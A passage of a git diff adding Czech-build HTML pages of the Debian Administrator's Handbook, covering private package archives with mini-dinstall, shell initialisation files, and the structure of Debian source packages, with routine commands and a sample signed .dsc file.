+            class="filename">/srv/vhosts/packages/mini-dinstall/incoming/</code>) and waits for new packages there; when a package is uploaded, it is installed into a Debian archive at <code
+            class="filename">/srv/vhosts/packages/</code>. The <code
+            class="command">mini-dinstall</code> command reads the <code
+            class="filename">*.changes</code> file created when the Debian package is generated. These files contain a list of all other files associated with the version of the package (<code
+            class="filename">*.deb</code>, <code
+            class="filename">*.dsc</code>, <code
+            class="filename">*.diff.gz</code>/<code
+            class="filename">*.debian.tar.gz</code>, <code
+            class="filename">*.orig.tar.gz</code>, or their equivalents with other compression tools), and these allow <code
+            class="command">mini-dinstall</code> to know which files to install. <code
+            class="filename">*.changes</code> files also contain the name of the target distribution (often <code
+            class="literal">unstable</code>) mentioned in the latest <code
+            class="filename">debian/changelog</code> entry, and <code
+            class="command">mini-dinstall</code> uses this information to decide where the package should be installed. This is why administrators must always change this field before building a package, and set it to <code
+            class="literal">internal</code> or <code
+            class="literal">updates</code>, depending on the target location. <code
+            class="command">mini-dinstall</code> then generates the files required by APT, such as <code
+            class="filename">Packages.gz</code>.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> <code
+                      class="command">apt-ftparchive</code></strong></p></div></div></div><a
+            id="id-1.18.6.9.2"
+            class="indexterm"></a><div
+            class="para">
+			If <code
+              class="command">mini-dinstall</code> seems too complex for your Debian archive needs, you can also use the <code
+              class="command">apt-ftparchive</code> command. This tool scans the contents of a directory and displays (on its standard output) a matching <code
+              class="filename">Packages</code> file. In the Falcot Corp case, administrators could upload the packages directly into <code
+              class="filename">/srv/vhosts/packages/updates/</code> or <code
+              class="filename">/srv/vhosts/packages/internal/</code>, then run the following commands to create the <code
+              class="filename">Packages.gz</code> files:
+		</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cd /srv/vhosts/packages</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>apt-ftparchive packages updates &gt;updates/Packages</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>gzip updates/Packages</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>apt-ftparchive packages internal &gt;internal/Packages</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>gzip internal/Packages</code></strong></pre><div
+            class="para">
+			The <code
+              class="command">apt-ftparchive sources</code> command allows creating <code
+              class="filename">Sources.gz</code> files in a similar fashion.
+		</div></div><div
+          class="para">
+			Configuring <code
+            class="command">mini-dinstall</code> requires setting up a <code
+            class="filename">~/.mini-dinstall.conf</code> file; in the Falcot Corp case, the contents are as follows:
+		</div><pre
+          class="programlisting">
+[DEFAULT]
+archive_style = flat
+archivedir = /srv/vhosts/packages
+
+verify_sigs = 0
+mail_to = admin@falcot.com
+
+generate_release = 1
+release_origin = Falcot Corp
+release_codename = stable
+
+[updates]
+release_label = Recompiled Debian Packages
+
+[internal]
+release_label = Internal Packages
+</pre><div
+          class="para">
+			One decision worth noting is the generation of <code
+            class="filename">Release</code> files for each archive. This can help manage package installation priorities using the <code
+            class="filename">/etc/apt/preferences</code> configuration file (see <a
+            class="xref"
+            href="sect.apt-get.html#sect.apt.priorities">6.2.5 – „Managing Package Priorities“</a> for details).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SECURITY</em></span> <code
+                      class="command">mini-dinstall</code> and permissions</strong></p></div></div></div><div
+            class="para">
+			Since <code
+              class="command">mini-dinstall</code> has been designed to run as a regular user, there's no need to run it as root. The easiest way is to configure everything within the user account belonging to the administrator in charge of creating the Debian packages. Since only this administrator has the required permissions to put files in the <code
+              class="filename">incoming/</code> directory, we can deduce that the administrator authenticated the origin of each package prior to deployment and <code
+              class="command">mini-dinstall</code> does not need to do it again. This explains the <code
+              class="literal">verify_sigs = 0</code> parameter (which means that signatures need not be verified). However, if the contents of packages are sensitive, we can reverse the setting and elect to authenticate with a keyring containing the public keys of persons allowed to create packages (configured with the <code
+              class="literal">extra_keyrings</code> parameter); <code
+              class="command">mini-dinstall</code> will then check the origin of each incoming package by analyzing the signature integrated to the <code
+              class="filename">*.changes</code> file.
+		</div></div><div
+          class="para">
+			Invoking <code
+            class="command">mini-dinstall</code> actually starts a daemon in the background. As long as this daemon runs, it will check for new packages in the <code
+            class="filename">incoming/</code> directory every half-hour; when a new package arrives, it will be moved to the archive and the appropriate <code
+            class="filename">Packages.gz</code> and <code
+            class="filename">Sources.gz</code> files will be regenerated. If running a daemon is a problem, <code
+            class="command">mini-dinstall</code> can also be manually invoked in batch mode (with the <code
+            class="literal">-b</code> option) every time a package is uploaded into the <code
+            class="filename">incoming/</code> directory. Other possibilities provided by <code
+            class="command">mini-dinstall</code> are documented in its <span
+            class="citerefentry"><span
+              class="refentrytitle">mini-dinstall</span>(1)</span> manual page.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>EXTRA</em></span> Generating a signed archive</strong></p></div></div></div><div
+            class="para">
+			The APT suite checks a chain of cryptographic signatures on the packages it handles before installing them, in order to ensure their authenticity (see <a
+              class="xref"
+              href="sect.package-authentication.html">6.5 – „Checking Package Authenticity“</a>). Private APT archives can then be a problem, since the machines using them will keep displaying warnings about unsigned packages. A diligent administrator will therefore integrate private archives with the secure APT mechanism.
+		</div><div
+            class="para">
+			To help with this process, <code
+              class="command">mini-dinstall</code> includes a <code
+              class="literal">release_signscript</code> configuration option that allows specifying a script to use for generating the signature. A good starting point is the <code
+              class="filename">sign-release.sh</code> script provided by the <span
+              class="pkg pkg">mini-dinstall</span> package in <code
+              class="filename">/usr/share/doc/mini-dinstall/examples/</code>; local changes may be relevant.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.building-first-package.html"><strong>Předcházející</strong>15.2. Building your First Package</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.becoming-package-maintainer.html"><strong>Další</strong>15.4. Becoming a Package Maintainer</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.shell-environment.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.shell-environment.html
new file mode 100644
index 000000000..bbd4650c9
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.shell-environment.html
@@ -0,0 +1,201 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.6. Shell Environment</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.creating-accounts.html"
+        title="8.5. Creating Accounts" /><link
+        rel="next"
+        href="sect.config-printing.html"
+        title="8.7. Printer Configuration" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.shell-environment.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.creating-accounts.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-printing.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.shell-environment"></a>8.6. Shell Environment</h2></div></div></div><div
+          class="para">
+			Command interpreters (or shells) can be a user's first point of contact with the computer, and they must therefore be rather friendly. Most of them use initialization scripts that allow configuration of their behavior (automatic completion, prompt text, etc.).
+		</div><a
+          id="id-1.11.10.3"
+          class="indexterm"></a><a
+          id="id-1.11.10.4"
+          class="indexterm"></a><a
+          id="id-1.11.10.5"
+          class="indexterm"></a><a
+          id="id-1.11.10.6"
+          class="indexterm"></a><div
+          class="para">
+			<code
+            class="command">bash</code>, the standard shell, uses the <code
+            class="filename">/etc/bash.bashrc</code> initialization script for “interactive” shells, and <code
+            class="filename">/etc/profile</code> for “login” shells.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Login shell and (non) interactive shell</strong></p></div></div></div><div
+            class="para">
+			In simple terms, a login shell is invoked when you login to the console either locally or remotely via <code
+              class="command">ssh</code>, or when you run an explicit <code
+              class="command">bash --login</code> command. Regardless of whether it is a login shell or not, a shell can be interactive (in an <code
+              class="command">xterm</code>-type terminal for instance); or non-interactive (when executing a script).
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>DISCOVERY</em></span> Other shells, other scripts</strong></p></div></div></div><div
+            class="para">
+			Each command interpreter has a specific syntax and its own configuration files. Thus, <code
+              class="command">zsh</code> uses <code
+              class="filename">/etc/zshrc</code> and <code
+              class="filename">/etc/zshenv</code>; <code
+              class="command">tcsh</code> uses <code
+              class="filename">/etc/csh.cshrc</code>, <code
+              class="filename">/etc/csh.login</code> and <code
+              class="filename">/etc/csh.logout</code>. The man pages for these programs document which files they use.
+		</div><a
+            id="id-1.11.10.9.3"
+            class="indexterm"></a><a
+            id="id-1.11.10.9.4"
+            class="indexterm"></a></div><div
+          class="para">
+			For <code
+            class="command">bash</code>, it is useful to activate “automatic completion” in the <code
+            class="filename">/etc/bash.bashrc</code> file (simply uncomment a few lines).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Automatic completion</strong></p></div></div></div><a
+            id="id-1.11.10.11.2"
+            class="indexterm"></a><div
+            class="para">
+			Many command interpreters provide a completion feature, which allows the shell to automatically complete a partially typed command name or argument when the user hits the <span
+              class="keycap"><strong>Tab</strong></span> key. This lets users work more efficiently and be less error-prone.
+		</div><div
+            class="para">
+			This function is very powerful and flexible. It is possible to configure its behavior according to each command. Thus, the first argument following <code
+              class="command">apt</code> will be proposed according to the syntax of this command, even if it does not match any file (in this case, the possible choices are <code
+              class="literal">install</code>, <code
+              class="literal">remove</code>, <code
+              class="literal">upgrade</code>, etc.).
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> The tilde, a shortcut to HOME</strong></p></div></div></div><a
+            id="id-1.11.10.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.10.12.3"
+            class="indexterm"></a><div
+            class="para">
+			The tilde is often used to indicate the directory to which the environment variable, <code
+              class="varname">HOME</code>, points (being the user's home directory, such as <code
+              class="filename">/home/rhertzog/</code>). Command interpreters automatically make the substitution: <code
+              class="filename">~/hello.txt</code> becomes <code
+              class="filename">/home/rhertzog/hello.txt</code>.
+		</div><div
+            class="para">
+			The tilde also allows access to another user's home directory. Thus, <code
+              class="filename">~rmas/bonjour.txt</code> is synonymous with <code
+              class="filename">/home/rmas/bonjour.txt</code>.
+		</div></div><div
+          class="para">
+			In addition to these common scripts, each user can create their own <code
+            class="filename">~/.bashrc</code> and <code
+            class="filename">~/.bash_profile</code> to configure their shell. The most common changes are the addition of aliases; these are words that are automatically replaced with the execution of a command, which makes it faster to invoke that command. For instance, you could create the <code
+            class="literal">la</code> alias for the command <code
+            class="command">ls -la | less</code> command; then you only have to type <code
+            class="command">la</code> to inspect the contents of a directory in detail.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Environment variables</strong></p></div></div></div><a
+            id="id-1.11.10.14.2"
+            class="indexterm"></a><a
+            id="id-1.11.10.14.3"
+            class="indexterm"></a><div
+            class="para">
+			Environment variables allow storage of global settings for the shell or various other programs called. They are contextual (each process has its own set of environment variables) but inheritable. This last characteristic offers the possibility for a login shell to declare variables which will be passed down to all programs it executes.
+		</div></div><div
+          class="para">
+			Setting default environment variables is an important element of shell configuration. Leaving aside the variables specific to a shell, it is preferable to place them in the <code
+            class="filename">/etc/environment</code> file, since it is used by the various programs likely to initiate a shell session. Variables typically defined there include <code
+            class="varname">ORGANIZATION</code>, which usually contains the name of the company or organization, and <code
+            class="varname">HTTP_PROXY</code>, which indicates the existence and location of an HTTP proxy.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> All shells configured identically</strong></p></div></div></div><div
+            class="para">
+			Users often want to configure their login and interactive shells in the same way. To do this, they choose to interpret (or “source”) the content from <code
+              class="filename">~/.bashrc</code> in the <code
+              class="filename">~/.bash_profile</code> file. It is possible to do the same with files common to all users (by calling <code
+              class="filename">/etc/bash.bashrc</code> from <code
+              class="filename">/etc/profile</code>).
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.creating-accounts.html"><strong>Předcházející</strong>8.5. Creating Accounts</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-printing.html"><strong>Další</strong>8.7. Printer Configuration</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.source-package-structure.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.source-package-structure.html
new file mode 100644
index 000000000..4e9b13f40
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.source-package-structure.html
@@ -0,0 +1,267 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5.3. Structure of a Source Package</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="prev"
+        href="sect.package-meta-information.html"
+        title="5.2. Package Meta-Information" /><link
+        rel="next"
+        href="sect.manipulating-packages-with-dpkg.html"
+        title="5.4. Manipulating Packages with dpkg" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.source-package-structure.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.package-meta-information.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.manipulating-packages-with-dpkg.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.source-package-structure"></a>5.3. Structure of a Source Package</h2></div></div></div><a
+          id="id-1.8.7.2"
+          class="indexterm"></a><a
+          id="id-1.8.7.3"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.7.4"></a>5.3.1. Format</h3></div></div></div><a
+            id="id-1.8.7.4.2"
+            class="indexterm"></a><a
+            id="id-1.8.7.4.3"
+            class="indexterm"></a><a
+            id="id-1.8.7.4.4"
+            class="indexterm"></a><a
+            id="id-1.8.7.4.5"
+            class="indexterm"></a><div
+            class="para">
+				A source package is usually comprised of three files, a <code
+              class="filename">.dsc</code>, a <code
+              class="filename">.orig.tar.gz</code>, and a <code
+              class="filename">.debian.tar.xz</code> (or <code
+              class="filename">.diff.gz</code>). They allow creation of binary packages (<code
+              class="filename">.deb</code> files described above) from the source code files of the program, which are written in a programming language.
+			</div><div
+            class="para">
+				The <code
+              class="filename">.dsc</code> (Debian Source Control) file is a short text file containing an RFC 2822 header (just like the <code
+              class="filename">control</code> file studied in <a
+              class="xref"
+              href="sect.package-meta-information.html#sect.control">5.2.1 – „Description: the <code
+                class="filename">control</code> File“</a>) which describes the source package and indicates which other files are part thereof. It is signed by its maintainer, which guarantees authenticity. See <a
+              class="xref"
+              href="sect.package-authentication.html">6.5 – „Checking Package Authenticity“</a> for further details on this subject.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.7.4.8"></a><p
+              class="title"><strong>Příklad 5.1. A <code
+                  class="filename">.dsc</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Format: 3.0 (quilt)
+Source: zim
+Binary: zim
+Architecture: all
+Version: 0.65-4
+Maintainer: Emfox Zhou &lt;emfox@debian.org&gt;
+Uploaders: Raphaël Hertzog &lt;hertzog@debian.org&gt;
+Homepage: http://zim-wiki.org
+Standards-Version: 3.9.8
+Vcs-Browser: https://anonscm.debian.org/cgit/collab-maint/zim.git
+Vcs-Git: https://anonscm.debian.org/git/collab-maint/zim.git
+Build-Depends: debhelper (&gt;= 9), xdg-utils, python (&gt;= 2.6.6-3~), libgtk2.0-0 (&gt;= 2.6), python-gtk2, python-xdg, dh-python
+Package-List:
+ zim deb x11 optional arch=all
+Checksums-Sha1:
+ 4a9be85c98b7f4397800f6d301428d64241034ce 1899614 zim_0.65.orig.tar.gz
+ 0ec38c990ec7662205dd0c843bf81f9033906a2e 10332 zim_0.65-4.debian.tar.xz
+Checksums-Sha256:
+ 5442f3334395a2beafc5b9a2bbec2e53e38270d4bad696b5c4053dd51dc1ed96 1899614 zim_0.65.orig.tar.gz
+ 78271df16aa166dce916b3ff4ecd705ed3a8832e49d3ef0bd8738a4fe8dd2b4f 10332 zim_0.65-4.debian.tar.xz
+Files:
+ 63ab7a2070e6d1d3fb32700a851d7b8b 1899614 zim_0.65.orig.tar.gz
+ 648559b38e04eaf4f6caa97563c057ff 10332 zim_0.65-4.debian.tar.xz
+
+-----BEGIN PGP SIGNATURE-----
+Comment: Signed by Raphael Hertzog
+
+iQEzBAEBCgAdFiEE1823g1EQnhJ1LsbSA4gdq+vCmrkFAlgzZXkACgkQA4gdq+vC
+mrnyXAf+M/PzZFjqk6Hvv1QSbocIDZ3bEqRjVpNLApubsPsEZZT6yw9vypzNE2hZ
+/BbLPa0Ntbhew4U+SJpuujV7VnLs9mZgOFuKRHKWYQBQ+oxw+gtM6iePwVj58aP/
+LW7K5gE428ohMdjIkf42Lz4Fve3dVPgPLIzQxRZ87N6OKqmS81M6/RRIF3TS/gJp
+CwpN1yifCfQs46gxL5/CgA4uhI8taz+g+8ZDd6fL5BQeFuNsgplY4QL1uGno3F7G
+VY7WZhM601Re2ePnv+6vjh8kDWMjZhfB4RJy0+hHezuoVGKljyaxc1O4P/fxvXus
+CEETju6cAE/HgDubDXDqExMwEd4odA==
+=HUvj
+-----END PGP SIGNATURE-----</pre></div></div><a
+            id="id-1.8.7.4.9"
+            class="indexterm"></a><div
+            class="para">
+				Note that the source package also has dependencies (<code
+              class="literal">Build-Depends</code>) completely distinct from those of binary packages, since they indicate tools required to compile the software in question and construct its binary package.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Distinct namespaces</strong></p></div></div></div><div
+              class="para">
+				It is important to note here that there is no required correspondence between the name of the source package and that of the binary package(s) that it generates. It is easy enough to understand if you know that each source package may generate several binary packages. This is why the <code
+                class="filename">.dsc</code> file has the <code
+                class="literal">Source</code> and <code
+                class="literal">Binary</code> fields to explicitly name the source package and store the list of binary packages that it generates.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Why divide into several packages</strong></p></div></div></div><div
+              class="para">
+				Quite frequently, a source package (for a given software) can generate several binary packages. The split is justified by the possibility to use (parts of) the software in different contexts. Consider a shared library, it may be installed to make an application work (for example, <span
+                class="pkg pkg">libc6</span>), or it can be installed to develop a new program (<span
+                class="pkg pkg">libc6-dev</span> will then be the correct package). We find the same logic for client/server services where we want to install the server part on one machine and the client part on others (this is the case, for example, of <span
+                class="pkg pkg">openssh-server</span> and <span
+                class="pkg pkg">openssh-client</span>).
+			</div><div
+              class="para">
+				Just as frequently, the documentation is provided in a dedicated package: the user may install it independently from the software, and may at any time choose to remove it to save disk space. Additionally, this also saves disk space on the Debian mirrors, since the documentation package will be shared amongst all of the architectures (instead of having the documentation duplicated in the packages for each architecture).
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>PERSPECTIVE</em></span> Different source package formats</strong></p></div></div></div><div
+              class="para">
+				Originally there was only one source package format. This is the <code
+                class="literal">1.0</code> format, which associates an <code
+                class="filename">.orig.tar.gz</code> archive to a <code
+                class="filename">.diff.gz</code> “debianization” patch (there is also a variant, consisting of a single <code
+                class="filename">.tar.gz</code> archive, which is automatically used if no <code
+                class="filename">.orig.tar.gz</code> is available).
+			</div><div
+              class="para">
+				Since Debian <span
+                class="distribution distribution">Squeeze</span>, Debian developers have the option to use new formats that correct many problems of the historical format. Format <code
+                class="literal">3.0 (quilt)</code> can combine multiple upstream archives in the same source package: in addition to the usual <code
+                class="filename">.orig.tar.gz</code>, supplementary <code
+                class="filename">.orig-<em
+                  class="replaceable">component</em>.tar.gz</code> archives can be included. This is useful with software that is distributed in several upstream components but for which a single source package is desired. These archives can also be compressed with <code
+                class="command">xz</code> rather than <code
+                class="command">gzip</code>, which saves disk space and network resources. Finally, the monolithic patch, <code
+                class="filename">.diff.gz</code> is replaced by a <code
+                class="filename">.debian.tar.xz</code> archive containing the compiling instructions and a set of upstream patches contributed by the package maintainer. These last are recorded in a format compatible with <code
+                class="command">quilt</code> — a tool that facilitates the management of a series of patches.
+			</div></div><div
+            class="para">
+				The <code
+              class="filename">.orig.tar.gz</code> file is an archive containing the source code as provided by the original developer. Debian package maintainers are asked to not modify this archive in order to be able to easily check the origin and integrity of the file (by simple comparison with a checksum) and to respect the wishes of some authors.
+			</div><div
+            class="para">
+				The <code
+              class="filename">.debian.tar.xz</code> contains all of the modifications made by the Debian maintainer, especially the addition of a <code
+              class="filename">debian</code> directory containing the instructions to execute to construct a Debian package.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Decompressing a source package</strong></p></div></div></div><a
+              id="id-1.8.7.4.16.2"
+              class="indexterm"></a><a
+              id="id-1.8.7.4.16.3"
+              class="indexterm"></a><a
+              id="id-1.8.7.4.16.4"
+              class="indexterm"></a><a
+              id="id-1.8.7.4.16.5"
+              class="indexterm"></a><div
+              class="para">
+				If you have a source package, you can use the <code
+                class="command">dpkg-source</code> command (from the <span
+                class="pkg pkg">dpkg-dev</span> package) to decompress it:
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg-source -x package_0.7-1.dsc</code></strong></pre><div
+              class="para">
+				You can also use <code
+                class="command">apt-get</code> to download a source package and unpack it right away. It requires that the appropriate <code
+                class="literal">deb-src</code> lines be present in the <code
+                class="filename">/etc/apt/sources.list</code> file, however (for further details, see <a
+                class="xref"
+                href="apt.html#sect.apt-sources.list">6.1 – „Filling in the <code
+                  class="filename">sources.list</code> File“</a>). These are used to list the “sources” of source packages (meaning the servers on which a group of source packages are hosted).
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>apt-get source <em
+                    class="replaceable">package</em></code></strong></pre></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.7.5"></a>5.3.2. Usage within Debian</h3></div></div></div><div
+            class="para">
+				The source package is the foundation of everything in Debian. All Debian packages come from a source package, and each modification in a Debian package is the consequence of a modification made to the source package. The Debian maintainers work with the source package, knowing, however, the consequences of their actions on the binary packages. The fruits of their labors are thus found in the source packages available from Debian: you can easily go back to them and everything stems from them.
+			</div><div
+            class="para">
+				When a new version of a package (source package and one or more binary packages) arrives on the Debian server, the source package is the most important. Indeed, it will then be used by a network of machines of different architectures for compilation on the various architectures supported by Debian. The fact that the developer also sends one or more binary packages for a given architecture (usually i386 or amd64) is relatively unimportant, since these could just as well have been automatically generated.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.package-meta-information.html"><strong>Předcházející</strong>5.2. Package Meta-Information</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.manipulating-packages-with-dpkg.html"><strong>Další</strong>5.4. Manipulating Packages with dpkg</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.supervision.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.supervision.html
new file mode 100644
index 000000000..01f499e31
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.supervision.html
@@ -0,0 +1,530 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.3. Supervision: Prevention, Detection, Deterrence</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.firewall-packet-filtering.html"
+        title="14.2. Firewall or Packet Filtering" /><link
+        rel="next"
+        href="sect.apparmor.html"
+        title="14.4. Introduction to AppArmor" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.supervision.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
